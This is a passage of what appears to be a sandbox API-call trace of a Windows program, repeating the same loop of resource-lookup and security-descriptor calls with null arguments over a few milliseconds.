pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.033] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.033] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.033] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.033] LockResource (hResData=0x0) returned 0x0 [0070.033] FreeResource (hResData=0x0) returned 0 [0070.033] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.034] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.034] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.034] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.034] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.034] LockResource (hResData=0x0) returned 0x0 [0070.034] FreeResource (hResData=0x0) returned 0 [0070.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.035] FreeResource (hResData=0x0) returned 0 [0070.035] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.035] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.035] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.035] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.035] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.035] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.036] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.036] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.036] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.036] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.036] LockResource (hResData=0x0) returned 0x0 [0070.036] FreeResource (hResData=0x0) returned 0 [0070.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.037] LockResource (hResData=0x0) returned 0x0 [0070.037] FreeResource (hResData=0x0) returned 0 [0070.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.037] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.037] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, 